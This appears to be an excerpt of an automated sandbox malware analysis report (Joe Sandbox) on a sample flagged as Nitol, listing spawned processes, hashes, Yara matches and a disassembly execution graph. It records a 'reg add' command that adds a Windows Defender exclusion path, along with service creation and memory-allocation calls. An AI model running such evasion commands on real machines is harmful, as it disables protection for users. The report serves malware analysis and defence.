                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:40
                                                                                      Start time:19:54:45
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:41
                                                                                      Start time:19:54:47
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:42
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:43
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:44
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:45
                                                                                      Start time:19:54:50
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:46
                                                                                      Start time:19:54:50
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:47
                                                                                      Start time:19:55:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:48
                                                                                      Start time:19:55:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:32%
                                                                                        Total number of Nodes:462
                                                                                        Total number of Limit Nodes:7
                                                                                        execution_graph 13935 140005df3 13936 140005e71 13935->13936 13937 140005e84 CreateFileA 13936->13937 13938 140005f50 __CxxFrameHandler 13937->13938 13939 140005fc3 malloc ReadFile 13938->13939 16523 7ffe1a5111b0 16530 7ffe1a511209 16523->16530 16524 7ffe1a511b90 51 API calls 16541 7ffe1a511300 _invalid_parameter_noinfo_noreturn 16524->16541 16525 7ffe1a5114f0 16556 7ffe1a511a40 16525->16556 16526 7ffe1a511b70 _log10_special 8 API calls 16529 7ffe1a5114d3 16526->16529 16527 7ffe1a51129e 16532 7ffe1a5114f6 16527->16532 16542 7ffe1a511b90 16527->16542 16528 7ffe1a5112c7 16533 7ffe1a511b90 51 API calls 16528->16533 16530->16525 16530->16527 16530->16528 16536 7ffe1a5112b9 BuildCatchObjectHelperInternal 16530->16536 16530->16541 16559 7ffe1a511110 16532->16559 16533->16536 16536->16524 16539 7ffe1a5114eb 16551 7ffe1a5179cc 16539->16551 16541->16526 16543 7ffe1a511b9b 16542->16543 16544 7ffe1a5112b0 16543->16544 16545 7ffe1a517a4c __free_lconv_num 2 API calls 16543->16545 16546 7ffe1a511bba 16543->16546 16544->16536 16544->16539 16545->16543 16547 7ffe1a511bc5 16546->16547 16565 7ffe1a5121f0 16546->16565 16549 7ffe1a511110 Concurrency::cancel_current_task 51 API calls 16547->16549 16550 7ffe1a511bcb 16549->16550 16552 7ffe1a517844 _invalid_parameter_noinfo 47 API calls 16551->16552 16553 7ffe1a5179e5 16552->16553 16554 7ffe1a5179fc _invalid_parameter_noinfo_noreturn 17 API calls 16553->16554 16555 7ffe1a5179fa 16554->16555 16569 7ffe1a511b34 16556->16569 16560 7ffe1a51111e Concurrency::cancel_current_task 16559->16560 16561 7ffe1a513990 Concurrency::cancel_current_task 2 API calls 16560->16561 16562 7ffe1a51112f 16561->16562 16563 7ffe1a51379c __std_exception_copy 49 API calls 16562->16563 16564 7ffe1a511159 16563->16564 16566 7ffe1a5121fe Concurrency::cancel_current_task 16565->16566 16567 7ffe1a513990 Concurrency::cancel_current_task 2 API calls 16566->16567 16568 7ffe1a51220f 16567->16568 16568->16568 16574 7ffe1a511ab0 16569->16574 16572 7ffe1a513990 Concurrency::cancel_current_task 2 API calls 16573 7ffe1a511b56 16572->16573 16575 7ffe1a51379c __std_exception_copy 49 API calls 16574->16575 16576 7ffe1a511ae4 16575->16576 16576->16572 15108 140007412 15110 140007333 15108->15110 15109 140007403 15110->15109 15111 1400073e0 LdrLoadDll 15110->15111 15111->15110 15488 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15491 1400054e0 15488->15491 15490 1400136ef 15492 14000552c 15491->15492 15495 140005506 _lock 15491->15495 15493 1400074d0 LdrLoadDll 15492->15493 15494 140005536 15493->15494 15496 140008370 3 API calls 15494->15496 15495->15490 15500 140005545 __CxxFrameHandler 15496->15500 15497 1400055b8 15498 140008de0 _lock 2 API calls 15497->15498 15499 1400055c0 sprintf_s 15498->15499 15499->15495 15500->15497 15501 1400074f0 LdrLoadDll 15500->15501 15502 140005561 CreateThread 15501->15502 15502->15499 15503 1400055b0 GetLastError 15502->15503 15503->15497 13944 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13945 140005ab1 13944->13945 13946 140005add GetVersionExA 13944->13946 13947 140005abf 13945->13947 13994 140009540 13945->13994 13948 140005b0e GetProcessHeap HeapFree 13946->13948 13949 140005af0 GetProcessHeap HeapFree 13946->13949 14002 140009300 13947->14002 13954 140005b3c 13948->13954 13952 140005d0b 13949->13952 13953 140005ac9 14013 140008510 GetModuleHandleA 13953->14013 14017 14000a310 HeapCreate 13954->14017 13957 140005bec 13958 140005c12 13957->13958 13959 140005bf0 13957->13959 13961 140005c17 13958->13961 13960 140005bfe 13959->13960 13962 140009540 _lock 12 API calls 13959->13962 13963 140009300 _lock 10 API calls 13960->13963 13964 140005c3d 13961->13964 13966 140005c29 13961->13966 13968 140009540 _lock 12 API calls 13961->13968 13962->13960 13965 140005c08 13963->13965 14020 140009f50 GetStartupInfoA 13964->14020 13967 140008510 _lock 3 API calls 13965->13967 13969 140009300 _lock 10 API calls 13966->13969 13967->13958 13968->13966 13970 140005c33 13969->13970 13972 140008510 _lock 3 API calls 13970->13972 13972->13964 13974 140005c56 14040 140009e30 13974->14040 13977 140005c5b 14058 140009c30 13977->14058 13981 140005c73 13982 140005c81 13981->13982 13983 1400084e0 _lock 12 API calls 13981->13983 14088 140009690 13982->14088 13983->13982 13985 140005c86 13986 140005c94 13985->13986 13988 1400084e0 _lock 12 API calls 13985->13988 14100 140008650 13986->14100 13988->13986 13989 140005c9e 13990 1400084e0 _lock 12 API calls 13989->13990 13991 140005ca9 13989->13991 13990->13991 14104 140001520 13991->14104 13993 140005ad3 13993->13952 14001 14000954e _lock 13994->14001 13995 14000961c 13995->13947 13996 14000959c 13997 140009300 _lock 10 API calls 13996->13997 13997->13995 13998 1400095c9 GetStdHandle 13998->13996 13999 1400095dc 13998->13999 13999->13996 14000 1400095e2 WriteFile 13999->14000 14000->13996 14001->13995 14001->13996 14001->13998 14003 140009320 _lock 14002->14003 14004 140009330 14003->14004 14005 1400094dc GetStdHandle 14003->14005 14008 140009375 _lock 14003->14008 14004->13953 14005->14004 14006 1400094ef 14005->14006 14006->14004 14007 1400094f5 WriteFile 14006->14007 14007->14004 14008->14004 14009 1400093b9 GetModuleFileNameA 14008->14009 14010 1400093d9 _lock 14009->14010 14122 14000f000 14010->14122 14014 140008543 ExitProcess 14013->14014 14015 14000852a GetProcAddress 14013->14015 14015->14014 14016 14000853f 14015->14016 14016->14014 14018 14000a334 14017->14018 14019 14000a339 HeapSetInformation 14017->14019 14018->13957 14019->13957 14148 140008370 14020->14148 14022 140008370 3 API calls 14026 140009f8a 14022->14026 14023 14000a1c4 GetStdHandle 14029 14000a17c 14023->14029 14024 14000a239 SetHandleCount 14032 140005c48 14024->14032 14025 14000a1d8 GetFileType 14025->14029 14026->14022 14027 14000a0e3 14026->14027 14026->14029 14026->14032 14028 14000a11c GetFileType 14027->14028 14027->14029 14027->14032 14153 14000edc0 14027->14153 14028->14027 14029->14023 14029->14024 14029->14025 14031 14000edc0 _lock 3 API calls 14029->14031 14029->14032 14031->14029 14032->13974 14033 1400084e0 14032->14033 14034 140009540 _lock 12 API calls 14033->14034 14035 1400084ed 14034->14035 14036 140009300 _lock 10 API calls 14035->14036 14037 1400084f4 14036->14037 14038 1400073e0 _lock LdrLoadDll 14037->14038 14039 140008500 14038->14039 14041 140009e7c 14040->14041 14042 140009e3e GetCommandLineW 14040->14042 14045 140009e81 GetCommandLineW 14041->14045 14046 140009e69 14041->14046 14043 140009e49 GetCommandLineW 14042->14043 14044 140009e5e GetLastError 14042->14044 14043->14044 14044->14046 14047 140009e75 14044->14047 14045->14046 14046->14047 14048 140009e91 GetCommandLineA MultiByteToWideChar 14046->14048 14047->13977 14049 140009ec8 14048->14049 14050 140009ed9 14048->14050 14049->13977 14051 140008370 3 API calls 14050->14051 14052 140009eeb 14051->14052 14053 140009f32 14052->14053 14054 140009ef3 MultiByteToWideChar 14052->14054 14053->13977 14055 140009f13 14054->14055 14056 140009f2a 14054->14056 14055->13977 14167 140008de0 14056->14167 14059 140009c52 GetEnvironmentStringsW 14058->14059 14063 140009c86 14058->14063 14061 140009c6c GetLastError 14059->14061 14067 140009c60 14059->14067 14060 140009c91 GetEnvironmentStringsW 14065 140005c67 14060->14065 14060->14067 14061->14063 14064 140009c77 14061->14064 14062 140009d09 GetEnvironmentStrings 14062->14065 14066 140009d17 14062->14066 14063->14060 14063->14064 14064->14062 14064->14065 14084 1400099c0 GetModuleFileNameW 14065->14084 14068 140009d58 14066->14068 14070 140009d20 MultiByteToWideChar 14066->14070 14067->14067 14172 140008300 14067->14172 14071 140008370 3 API calls 14068->14071 14070->14065 14070->14066 14073 140009d68 14071->14073 14076 140009d7d 14073->14076 14077 140009d70 FreeEnvironmentStringsA 14073->14077 14074 140009ce1 __CxxFrameHandler 14079 140009cef FreeEnvironmentStringsW 14074->14079 14075 140009cd1 FreeEnvironmentStringsW 14075->14065 14078 140009de5 FreeEnvironmentStringsA 14076->14078 14080 140009d90 MultiByteToWideChar 14076->14080 14077->14065 14078->14065 14079->14065 14080->14076 14081 140009e0e 14080->14081 14082 140008de0 _lock 2 API calls 14081->14082 14083 140009e16 FreeEnvironmentStringsA 14082->14083 14083->14065 14085 140009a03 14084->14085 14086 140008300 _lock 17 API calls 14085->14086 14087 140009bca 14085->14087 14086->14087 14087->13981 14089 1400096b2 14088->14089 14090 1400096a8 14088->14090 14091 140008370 3 API calls 14089->14091 14090->13985 14099 1400096fa 14091->14099 14092 140009709 14092->13985 14093 1400097a5 14094 140008de0 _lock 2 API calls 14093->14094 14095 1400097b4 14094->14095 14095->13985 14096 140008370 3 API calls 14096->14099 14097 1400097e5 14098 140008de0 _lock 2 API calls 14097->14098 14098->14095 14099->14092 14099->14093 14099->14096 14099->14097 14101 140008666 14100->14101 14103 1400086bf 14101->14103 14188 140005380 14101->14188 14103->13989 14105 140001565 14104->14105 14106 140001569 14105->14106 14108 14000157e 14105->14108 14226 140001430 GetModuleFileNameW OpenSCManagerW 14106->14226 14110 140001595 OpenSCManagerW 14108->14110 14111 14000164f 14108->14111 14112 1400015b2 GetLastError 14110->14112 14113 1400015cf OpenServiceW 14110->14113 14114 140001654 14111->14114 14115 140001669 StartServiceCtrlDispatcherW 14111->14115 14112->13993 14116 140001611 DeleteService 14113->14116 14117 1400015e9 GetLastError CloseServiceHandle 14113->14117 14235 1400011f0 14114->14235 14115->13993 14119 140001626 CloseServiceHandle CloseServiceHandle 14116->14119 14120 14000161e GetLastError 14116->14120 14117->13993 14119->13993 14120->14119 14123 14000f01e _lock 14122->14123 14124 14000f03b LoadLibraryA 14123->14124 14125 14000f125 _lock 14123->14125 14126 14000f054 GetProcAddress 14124->14126 14127 1400094c9 14124->14127 14138 14000f165 14125->14138 14145 1400073e0 LdrLoadDll 14125->14145 14126->14127 14128 14000f06d _lock 14126->14128 14127->13953 14132 14000f075 GetProcAddress 14128->14132 14129 1400073e0 _lock LdrLoadDll 14137 14000f1e9 14129->14137 14131 1400073e0 _lock LdrLoadDll 14131->14127 14134 140007220 _lock 14132->14134 14136 14000f094 GetProcAddress 14134->14136 14135 1400073e0 _lock LdrLoadDll 14135->14138 14140 14000f0b3 _lock 14136->14140 14139 1400073e0 _lock LdrLoadDll 14137->14139 14142 14000f1a3 _lock 14137->14142 14138->14129 14138->14142 14139->14142 14140->14125 14141 14000f0e9 GetProcAddress 14140->14141 14143 14000f101 _lock 14141->14143 14142->14131 14143->14125 14144 14000f10d GetProcAddress 14143->14144 14144->14125 14146 140007333 14145->14146 14146->14145 14147 140007403 14146->14147 14147->14135 14150 1400083a0 14148->14150 14151 1400083be Sleep 14150->14151 14152 1400083e0 14150->14152 14159 14000e850 14150->14159 14151->14150 14151->14152 14152->14026 14154 1400073e0 _lock LdrLoadDll 14153->14154 14155 14000edec _lock 14154->14155 14156 14000ee26 GetModuleHandleA 14155->14156 14157 14000ee1d _lock 14155->14157 14156->14157 14158 14000ee38 GetProcAddress 14156->14158 14157->14027 14158->14157 14160 14000e865 14159->14160 14161 14000e8be HeapAlloc 14160->14161 14163 14000e876 _lock 14160->14163 14164 1400090b0 14160->14164 14161->14160 14161->14163 14163->14150 14165 1400073e0 _lock LdrLoadDll 14164->14165 14166 1400090c5 14165->14166 14166->14160 14168 140008de9 HeapFree 14167->14168 14169 140008e19 _lock 14167->14169 14168->14169 14170 140008dff _lock 14168->14170 14169->14053 14171 140008e09 GetLastError 14170->14171 14171->14169 14174 140008320 14172->14174 14175 140008338 Sleep 14174->14175 14176 140008358 14174->14176 14177 1400090f0 14174->14177 14175->14174 14175->14176 14176->14074 14176->14075 14178 14000919e 14177->14178 14183 140009103 14177->14183 14179 1400090b0 _lock LdrLoadDll 14178->14179 14181 1400091a3 _lock 14179->14181 14180 14000914c HeapAlloc 14180->14183 14186 140009173 _lock 14180->14186 14181->14174 14182 140009540 _lock 12 API calls 14182->14183 14183->14180 14183->14182 14184 140009300 _lock 10 API calls 14183->14184 14185 1400090b0 _lock LdrLoadDll 14183->14185 14183->14186 14187 140008510 _lock 3 API calls 14183->14187 14184->14183 14185->14183 14186->14174 14187->14183 14191 140005250 14188->14191 14190 140005389 14190->14103 14192 140005271 14191->14192 14193 1400073e0 _lock LdrLoadDll 14192->14193 14194 14000527e 14193->14194 14195 1400073e0 _lock LdrLoadDll 14194->14195 14196 14000528d 14195->14196 14202 1400052f0 _lock 14196->14202 14203 140008490 14196->14203 14198 1400052b5 14199 1400052d9 14198->14199 14198->14202 14206 140008400 14198->14206 14201 140008400 7 API calls 14199->14201 14199->14202 14201->14202 14202->14190 14204 1400084c5 HeapSize 14203->14204 14205 140008499 _lock 14203->14205 14205->14198 14208 140008430 14206->14208 14209 140008450 Sleep 14208->14209 14210 140008472 14208->14210 14211 14000e920 14208->14211 14209->14208 14209->14210 14210->14199 14212 14000e935 14211->14212 14213 14000e94c 14212->14213 14223 14000e95e 14212->14223 14214 140008de0 _lock 2 API calls 14213->14214 14217 14000e951 14214->14217 14215 14000e9b1 14216 1400090b0 _lock LdrLoadDll 14215->14216 14219 14000e9b9 _lock 14216->14219 14217->14208 14218 14000e973 HeapReAlloc 14218->14219 14218->14223 14219->14208 14220 14000e9f4 _lock 14222 14000e9f9 GetLastError 14220->14222 14221 1400090b0 _lock LdrLoadDll 14221->14223 14222->14219 14223->14215 14223->14218 14223->14220 14223->14221 14224 14000e9db _lock 14223->14224 14225 14000e9e0 GetLastError 14224->14225 14225->14219 14227 140001482 CreateServiceW 14226->14227 14228 14000147a GetLastError 14226->14228 14230 1400014ea GetLastError 14227->14230 14231 1400014df CloseServiceHandle 14227->14231 14229 1400014fd 14228->14229 14241 140004f30 14229->14241 14232 1400014f2 CloseServiceHandle 14230->14232 14231->14232 14232->14229 14234 14000150d 14234->13993 14236 1400011fa 14235->14236 14250 1400051d0 14236->14250 14239 140004f30 sprintf_s NtAllocateVirtualMemory 14240 140001262 14239->14240 14240->13993 14243 140004f39 __CxxFrameHandler 14241->14243 14242 140004f44 14242->14234 14243->14242 14246 140006c95 14243->14246 14245 14000660e sprintf_s 14245->14234 14247 140006d9d 14246->14247 14248 140006d7b 14246->14248 14247->14245 14248->14247 14249 140006f95 NtAllocateVirtualMemory 14248->14249 14249->14247 14253 140008270 14250->14253 14252 140001238 MessageBoxW 14252->14239 14254 1400082ac _lock 14253->14254 14255 14000827e 14253->14255 14254->14252 14255->14254 14257 140008120 14255->14257 14258 14000816a 14257->14258 14262 14000813b _lock 14257->14262 14260 1400081d7 14258->14260 14258->14262 14263 140007f50 14258->14263 14261 140007f50 sprintf_s 54 API calls 14260->14261 14260->14262 14261->14262 14262->14254 14264 140007f69 sprintf_s 14263->14264 14265 140007f74 _lock 14264->14265 14266 14000801d 14264->14266 14276 14000cd50 14264->14276 14265->14260 14267 1400080d5 14266->14267 14268 14000802f 14266->14268 14269 14000cc00 sprintf_s 54 API calls 14267->14269 14270 14000804c 14268->14270 14272 140008081 14268->14272 14274 140008056 14269->14274 14279 14000cc00 14270->14279 14272->14274 14287 14000c2a0 14272->14287 14274->14260 14277 140008300 _lock 17 API calls 14276->14277 14278 14000cd6a 14277->14278 14278->14266 14280 14000cc3f 14279->14280 14286 14000cc23 _lock sprintf_s 14279->14286 14280->14286 14295 14000fc50 14280->14295 14284 14000ccc5 _lock sprintf_s 14340 14000fd20 LeaveCriticalSection 14284->14340 14286->14274 14288 14000c2e0 14287->14288 14291 14000c2c3 _lock sprintf_s 14287->14291 14289 14000fc50 sprintf_s 25 API calls 14288->14289 14288->14291 14290 14000c34e 14289->14290 14292 14000c1f0 sprintf_s 2 API calls 14290->14292 14293 14000c367 _lock sprintf_s 14290->14293 14291->14274 14292->14293 14374 14000fd20 LeaveCriticalSection 14293->14374 14296 14000fc96 14295->14296 14297 14000fccb 14295->14297 14341 14000b400 14296->14341 14299 14000ccac 14297->14299 14300 14000fccf EnterCriticalSection 14297->14300 14299->14284 14305 14000c3f0 14299->14305 14300->14299 14308 14000c42e 14305->14308 14324 14000c427 _lock sprintf_s 14305->14324 14306 140004f30 sprintf_s NtAllocateVirtualMemory 14307 14000cbe6 14306->14307 14307->14284 14311 14000c4fb __CxxFrameHandler sprintf_s 14308->14311 14308->14324 14368 14000c1f0 14308->14368 14310 14000c841 14312 14000c86a 14310->14312 14313 14000cb20 WriteFile 14310->14313 14311->14310 14316 14000c526 GetConsoleMode 14311->14316 14315 14000c936 14312->14315 14320 14000c876 14312->14320 14314 14000cb53 GetLastError 14313->14314 14313->14324 14314->14324 14321 14000c940 14315->14321 14330 14000ca02 14315->14330 14316->14310 14317 14000c557 14316->14317 14317->14310 14318 14000c564 GetConsoleCP 14317->14318 14318->14324 14335 14000c581 sprintf_s 14318->14335 14319 14000c8c5 WriteFile 14319->14320 14322 14000c928 GetLastError 14319->14322 14320->14319 14320->14324 14321->14324 14325 14000c991 WriteFile 14321->14325 14322->14324 14323 14000ca57 WideCharToMultiByte 14326 14000cb15 GetLastError 14323->14326 14323->14330 14324->14306 14325->14321 14327 14000c9f4 GetLastError 14325->14327 14326->14324 14327->14324 14328 14000cab0 WriteFile 14329 14000caf6 GetLastError 14328->14329 14328->14330 14329->14324 14329->14330 14330->14323 14330->14324 14330->14328 14331 14000c649 WideCharToMultiByte 14331->14324 14332 14000c68c WriteFile 14331->14332 14333 14000c80d GetLastError 14332->14333 14332->14335 14333->14324 14334 14000c829 GetLastError 14334->14324 14335->14324 14335->14331 14335->14334 14336 14000c6e2 WriteFile 14335->14336 14337 14000fd50 7 API calls sprintf_s 14335->14337 14339 14000c81b GetLastError 14335->14339 14336->14335 14338 14000c7ff GetLastError 14336->14338 14337->14335 14338->14324 14339->14324 14342 14000b41e 14341->14342 14343 14000b42f EnterCriticalSection 14341->14343 14347 14000b2f0 14342->14347 14345 14000b423 14345->14343 14346 1400084e0 _lock 12 API calls 14345->14346 14346->14343 14348 14000b317 14347->14348 14349 14000b32e 14347->14349 14350 140009540 _lock 12 API calls 14348->14350 14351 14000b342 _lock 14349->14351 14353 140008300 _lock 17 API calls 14349->14353 14352 14000b31c 14350->14352 14351->14345 14354 140009300 _lock 10 API calls 14352->14354 14355 14000b350 14353->14355 14356 14000b324 14354->14356 14355->14351 14357 14000b400 _lock 22 API calls 14355->14357 14358 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14356->14358 14359 14000b371 14357->14359 14358->14349 14360 14000b3a7 14359->14360 14361 14000b379 14359->14361 14363 140008de0 _lock HeapFree GetLastError 14360->14363 14362 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14361->14362 14364 14000b386 14362->14364 14367 14000b392 _lock 14363->14367 14366 140008de0 _lock HeapFree GetLastError 14364->14366 14364->14367 14365 14000b3b0 LeaveCriticalSection 14365->14351 14366->14367 14367->14365 14369 14000c20c sprintf_s 14368->14369 14370 14000c212 _lock 14369->14370 14371 14000c22c SetFilePointer 14369->14371 14370->14311 14372 14000c24a GetLastError 14371->14372 14373 14000c254 sprintf_s 14371->14373 14372->14373 14373->14311 13940 140006c95 13941 140006d9d 13940->13941 13942 140006d7b 13940->13942 13942->13941 13943 140006f95 NtAllocateVirtualMemory 13942->13943 13943->13941 14375 1400054e0 14376 14000552c 14375->14376 14379 140005506 _lock 14375->14379 14388 1400074d0 14376->14388 14380 140008370 3 API calls 14384 140005545 __CxxFrameHandler 14380->14384 14381 1400055b8 14382 140008de0 _lock 2 API calls 14381->14382 14383 1400055c0 sprintf_s 14382->14383 14383->14379 14384->14381 14392 1400074f0 14384->14392 14387 1400055b0 GetLastError 14387->14381 14390 140007333 14388->14390 14389 140005536 14389->14380 14390->14389 14391 1400073e0 LdrLoadDll 14390->14391 14391->14390 14393 140007333 14392->14393 14394 140005561 CreateThread 14393->14394 14395 1400073e0 LdrLoadDll 14393->14395 14394->14383 14394->14387 14395->14393

                                                                                        Executed Functions

                                                                                        Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 160 140006fdc-140007020 155->160 156->132 159 140006f37-140006f7a 157->159 158->159 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                        • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                        • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                        • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
